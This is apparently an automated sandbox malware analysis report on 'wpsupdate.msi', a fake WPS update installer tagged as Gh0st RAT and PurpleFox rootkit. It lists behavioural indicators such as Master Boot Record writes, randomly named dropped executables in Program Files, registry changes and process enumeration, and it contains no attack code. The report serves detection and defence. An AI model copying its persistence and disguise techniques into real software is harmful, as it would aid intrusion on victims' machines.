Malware Analysis Report

2024-12-07 13:54

Sample ID: 241119-fgscbs1emk
Target: wpsupdate.msi.vir
SHA256: c17c018f5df7a413dc053a325b6c291c9cd84f1b9e2415ffe205e02a7e5d6b4a
Tags: bootkit, discovery, execution, persistence, privilege_escalation, gh0strat, purplefox, rat, rootkit, trojan
Score: 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score: 10/10

SHA256: c17c018f5df7a413dc053a325b6c291c9cd84f1b9e2415ffe205e02a7e5d6b4a

Threat Level: Known bad

The file wpsupdate.msi.vir was found to be: Known bad.

Malicious Activity Summary

Tags: bootkit, discovery, execution, persistence, privilege_escalation, gh0strat, purplefox, rat, rootkit, trojan

Gh0st RAT payload

Purplefox family

Detect PurpleFox Rootkit

PurpleFox

Gh0strat

Gh0strat family

Command and Scripting Interpreter: PowerShell

Writes to the Master Boot Record (MBR)

Enumerates connected drives

Drops file in System32 directory

Drops file in Windows directory

Drops file in Program Files directory

Executes dropped EXE

Event Triggered Execution: Installer Packages

System Network Configuration Discovery: Internet Connection Discovery

System Location Discovery: System Language Discovery

Suspicious use of FindShellTrayWindow

Modifies data under HKEY_USERS

Checks SCSI registry key(s)

Suspicious use of WriteProcessMemory

Suspicious use of SendNotifyMessage

Suspicious behavior: CmdExeWriteProcessMemorySpam

Modifies registry class

Runs ping.exe

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Uses Volume Shadow Copy service COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-11-19 04:51

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-11-19 04:50
Reported: 2024-11-19 04:53
Platform: win7-20241010-en
Max time kernel: 118s
Max time network: 125s

Command Line

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\wpsupdate.msi

Signatures

Command and Scripting Interpreter: PowerShell

Tags: execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Enumerates connected drives

Description | Indicator | Process | Target
File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A
File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A
File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A
File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A
File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A
File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A
File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A
File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A
File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A
File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A
File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A
File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A
File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A
File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A
File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A
File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A
File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A
File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A
File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A
File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A
File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A
File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A
File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A
File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A
File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A
File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A
File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A
File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A
File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A
File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A
File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A
File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A
File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A
File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A
File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A
File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A
File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A
File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A
File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A
File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A
File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A
File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A
File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A
File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A
File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A
File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A

Writes to the Master Boot Record (MBR)

Tags: bootkit, persistence
Description | Indicator | Process | Target
File opened for modification | \??\PhysicalDrive0 | C:\Program Files\TransformOptimisticContributor\wpsupdate.exe | N/A

Drops file in System32 directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Drops file in Program Files directory

Description | Indicator | Process | Target
File opened for modification | C:\Program Files\TransformOptimisticContributor\2_WSEcydALszNI.exe | C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe | N/A
File created | C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.exe | C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe | N/A
File created | C:\Program Files\TransformOptimisticContributor\WhlKFlLXxHUitNNcNwtpUJDzrKytNL | C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe | N/A
File created | C:\Program Files\TransformOptimisticContributor\WSEcydALszNI | C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe | N/A
File created | C:\Program Files\TransformOptimisticContributor\2_WSEcydALszNI.exe | C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe | N/A
File created | C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.xml | C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe | N/A
File opened for modification | C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe | C:\Windows\system32\MsiExec.exe | N/A
File created | C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe | C:\Windows\system32\msiexec.exe | N/A
File created | C:\Program Files\TransformOptimisticContributor\VC_redist.x64.exe | C:\Windows\system32\msiexec.exe | N/A
File opened for modification | C:\Program Files\TransformOptimisticContributor\WhlKFlLXxHUitNNcNwtpUJDzrKytNL | C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe | N/A
File opened for modification | C:\Program Files\TransformOptimisticContributor\pvugBgEMyjnfIRZnnRolAMMekSRFAr | C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe | N/A
File created | C:\Program Files\TransformOptimisticContributor\wpsupdate.exe | C:\Windows\system32\msiexec.exe | N/A
File created | C:\Program Files\TransformOptimisticContributor\YRtKSPCVXxSCmPuaAzactTPSddUXyw | C:\Windows\system32\msiexec.exe | N/A
File created | C:\Program Files\TransformOptimisticContributor\pvugBgEMyjnfIRZnnRolAMMekSRFAr | C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe | N/A
File created | C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe | C:\Windows\system32\MsiExec.exe | N/A
File created | C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.vbs | C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe | N/A
File opened for modification | C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.xml | C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe | N/A
File opened for modification | C:\Program Files\TransformOptimisticContributor\WSEcydALszNI | C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe | N/A
File opened for modification | C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.exe | C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe | N/A

Drops file in Windows directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\INF\setupapi.ev3 | C:\Windows\system32\DrvInst.exe | N/A
File opened for modification | C:\Windows\INF\setupapi.ev1 | C:\Windows\system32\DrvInst.exe | N/A
File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\DrvInst.exe | N/A
File created | C:\Windows\Installer\f779176.msi | C:\Windows\system32\msiexec.exe | N/A
File created | C:\Windows\Installer\f779177.ipi | C:\Windows\system32\msiexec.exe | N/A
File opened for modification | C:\Windows\Installer\MSI9398.tmp | C:\Windows\system32\msiexec.exe | N/A
File opened for modification | C:\Windows\Installer\f779176.msi | C:\Windows\system32\msiexec.exe | N/A
File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A
File created | C:\Windows\Installer\f779179.msi | C:\Windows\system32\msiexec.exe | N/A
File opened for modification | C:\Windows\Installer\f779177.ipi | C:\Windows\system32\msiexec.exe | N/A

Event Triggered Execution: Installer Packages

Tags: persistence, privilege_escalation
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\msiexec.exe | N/A

System Location Discovery: System Language Discovery

Tags: discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files\TransformOptimisticContributor\wpsupdate.exe | N/A

System Network Configuration Discovery: Internet Connection Discovery

Tags: discovery
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\cmd.exe | N/A
N/A | N/A | C:\Windows\system32\PING.EXE | N/A

Modifies data under HKEY_USERS

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\.DEFAULT\Software\Kingsoft\Office\6.0\Common\khdinfo | C:\Program Files\TransformOptimisticContributor\wpsupdate.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\DrvInst.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\DrvInst.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\DrvInst.exe | N/A
Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E | C:\Windows\system32\msiexec.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software | C:\Program Files\TransformOptimisticContributor\wpsupdate.exe | N/A
Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Kingsoft\Office\6.0\Common\InfoHD3Verify_C = 32003000320034002d00310031002d00310039007c00570044004300200032002e0035002b00320033003200310033003800380030003400310036003500200020002000200020002000200020007c00440045002d00380043002d00460041002d00300044002d00370037002d00390031000000 | C:\Program Files\TransformOptimisticContributor\wpsupdate.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\DrvInst.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\DrvInst.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Kingsoft\Office\6.0\Common | C:\Program Files\TransformOptimisticContributor\wpsupdate.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Kingsoft\Office | C:\Program Files\TransformOptimisticContributor\wpsupdate.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\system32\DrvInst.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\DrvInst.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\DrvInst.exe | N/A
Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = b0ed38ba3e3adb01 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\DrvInst.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\DrvInst.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2E | C:\Windows\system32\msiexec.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\DrvInst.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\system32\DrvInst.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\system32\DrvInst.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\DrvInst.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\DrvInst.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\DrvInst.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\DrvInst.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\DrvInst.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Program Files\TransformOptimisticContributor\wpsupdate.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\DrvInst.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\DrvInst.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\DrvInst.exe | N/A
Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D | C:\Windows\system32\msiexec.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\system32\DrvInst.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\DrvInst.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Kingsoft\Office\6.0\Common\khdinfo\InfoLastHardInfo | C:\Program Files\TransformOptimisticContributor\wpsupdate.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\DrvInst.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My | C:\Windows\system32\DrvInst.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\DrvInst.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\DrvInst.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\DrvInst.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\DrvInst.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\DrvInst.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\DrvInst.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\system32\DrvInst.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Kingsoft\Office\6.0\Common\InfoHDt = "19" | C:\Program Files\TransformOptimisticContributor\wpsupdate.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings | C:\Program Files\TransformOptimisticContributor\wpsupdate.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\DrvInst.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\DrvInst.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\DrvInst.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Kingsoft | C:\Program Files\TransformOptimisticContributor\wpsupdate.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Kingsoft\Office\6.0\Common\InfoHD = "0ca3b9e96ee0caa1964f7df64a0e12d5" | C:\Program Files\TransformOptimisticContributor\wpsupdate.exe | N/A
Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\system32\DrvInst.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Kingsoft\Office\6.0\Common\InfoHD3t = "19" | C:\Program Files\TransformOptimisticContributor\wpsupdate.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\DrvInst.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\DrvInst.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\DrvInst.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\DrvInst.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\DrvInst.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Kingsoft\Office\6.0 | C:\Program Files\TransformOptimisticContributor\wpsupdate.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\DrvInst.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\DrvInst.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Kingsoft\Office\6.0\Common\khdinfo\InfoHDModifiedType = "hdidRecalByOldHdidFromRegIsEmpty|2024-11-19" | C:\Program Files\TransformOptimisticContributor\wpsupdate.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Kingsoft\Office\6.0\Common\InfoHD3_C = "0ca3b9e96ee0caa1964f7df64a0e12d5" | C:\Program Files\TransformOptimisticContributor\wpsupdate.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Kingsoft\Office\6.0\Common\khdinfo\InfoCurHardInfo = "29a56b8a14940c3acb7a4a6443907c56|e4e4a4398a3b0b769cabd9f30bb48026" | C:\Program Files\TransformOptimisticContributor\wpsupdate.exe | N/A

Modifies registry class

Description | Indicator | Process | Target
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\ProductName = "TransformOptimisticContributor" | C:\Windows\system32\msiexec.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\PackageCode = "CCD296EAB4068834AB0FC3DB62EF5779" | C:\Windows\system32\msiexec.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\Version = "100859912" | C:\Windows\system32\msiexec.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\AdvertiseFlags = "388" | C:\Windows\system32\msiexec.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\AuthorizedLUAApp = "0" | C:\Windows\system32\msiexec.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\DeploymentFlags = "3" | C:\Windows\system32\msiexec.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\SourceList\PackageName = "wpsupdate.msi" | C:\Windows\system32\msiexec.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\0FEBA7E590D91C9459F27EF33A43D970 | C:\Windows\system32\msiexec.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\ED4346F32F1F8CA46B2D014BA47DCC9B | C:\Windows\system32\msiexec.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" | C:\Windows\system32\msiexec.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\" | C:\Windows\system32\msiexec.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\0FEBA7E590D91C9459F27EF33A43D970\ProductFeature | C:\Windows\system32\msiexec.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970 | C:\Windows\system32\msiexec.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\Language = "1033" | C:\Windows\system32\msiexec.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\InstanceType = "0" | C:\Windows\system32\msiexec.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\ED4346F32F1F8CA46B2D014BA47DCC9B\0FEBA7E590D91C9459F27EF33A43D970 | C:\Windows\system32\msiexec.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\SourceList\Net | C:\Windows\system32\msiexec.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\SourceList\Media\1 = ";" | C:\Windows\system32\msiexec.exe | N/A
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\Clients = 3a0000000000 | C:\Windows\system32\msiexec.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\Assignment = "1" | C:\Windows\system32\msiexec.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\SourceList | C:\Windows\system32\msiexec.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\0FEBA7E590D91C9459F27EF33A43D970\SourceList\Media | C:\Windows\system32\msiexec.exe | N/A

Runs ping.exe

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\PING.EXE | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\msiexec.exe | N/A
N/A | N/A | C:\Windows\system32\msiexec.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Program Files\TransformOptimisticContributor\wpsupdate.exe | N/A
N/A | N/A | C:\Program Files\TransformOptimisticContributor\wpsupdate.exe | N/A
N/A | N/A | C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe | N/A
N/A | N/A | C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe | N/A
N/A | N/A | C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe | N/A
N/A | N/A | C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe | N/A
N/A | N/A | C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe | N/A
N/A | N/A | C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe | N/A
N/A | N/A | C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe | N/A
N/A | N/A | C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe | N/A
N/A | N/A | C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe | N/A
N/A | N/A | C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe | N/A
N/A | N/A | C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe | N/A
N/A | N/A | C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe | N/A
N/A | N/A | C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe | N/A
N/A | N/A | C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe | N/A
N/A | N/A | C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe | N/A
N/A | N/A | C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe | N/A
N/A | N/A | C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe | N/A
N/A | N/A | C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe | N/A
N/A | N/A | C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe | N/A
N/A | N/A | C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe | N/A
N/A | N/A | C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe | N/A
N/A | N/A | C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe | N/A
N/A | N/A | C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe | N/A
N/A | N/A | C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe | N/A
N/A | N/A | C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe | N/A
N/A | N/A | C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe | N/A
N/A | N/A | C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe | N/A
N/A | N/A | C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe | N/A
N/A | N/A | C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe | N/A
N/A | N/A | C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe | N/A
N/A | N/A | C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe | N/A
